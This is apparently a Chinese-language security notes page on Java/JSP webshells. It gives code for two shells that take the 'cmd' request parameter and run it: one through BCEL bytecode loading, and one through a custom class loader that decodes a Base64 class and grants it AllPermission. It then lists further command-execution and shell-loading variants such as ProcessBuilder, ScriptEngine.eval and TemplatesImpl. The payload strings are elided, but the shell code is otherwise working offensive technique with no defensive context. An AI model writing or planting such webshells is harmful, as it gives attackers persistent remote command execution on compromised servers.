5.3.10. WebShell

江小悠 55 0

5.3.10.1. BCEL字节码

String bcelCode = "...";
response.getOutputStream().write(String.valueOf(new ClassLoader().loadClass(bcelCode).getConstructor(String.class).newInstance(request.getParameter("cmd")).toString()).getBytes());

5.3.10.2. 自定义类加载器

response.getOutputStream().write(new ClassLoader() {
    @Override
    public Class<?> loadClass(String name) throws ClassNotFoundException {
        if (name.contains("shell")) {
            return findClass(name);
        }
        return super.loadClass(name);
    }

    @Override
    protected Class<?> findClass(String name) throws ClassNotFoundException {
        try {
            byte[] bytes = Base64.getDecoder().decode("...");
            PermissionCollection pc = new Permissions();
            pc.add(new AllPermission());
            ProtectionDomain protectionDomain = new ProtectionDomain(new CodeSource(null, (Certificate[]) null), pc, this, null);
            return this.defineClass(name, bytes, 0, bytes.length, protectionDomain);
        } catch (Exception e) {
            e.printStackTrace();
        }
        return super.findClass(name);
    }
}.loadClass("shell").getConstructor(String.class).newInstance(request.getParameter("cmd")).toString().getBytes());
%>

5.3.10.3. 执行命令变式

  • java.lang.ProcessBuilder
  • MethodAccessor.invoke
  • Method.invoke
  • TemplatesImpl

5.3.10.4. 其他Shell变式

  • ScriptEngine.eval
  • URLClassLoader
  • ToolProvider.getSystemJavaCompiler
  • jdk.nashorn.internal.runtime.ScriptLoader
  • ObjectInputStream.resolveClass

本文作者为江小悠,转载请注明。

发表评论 取消回复
表情 图片 链接 代码

分享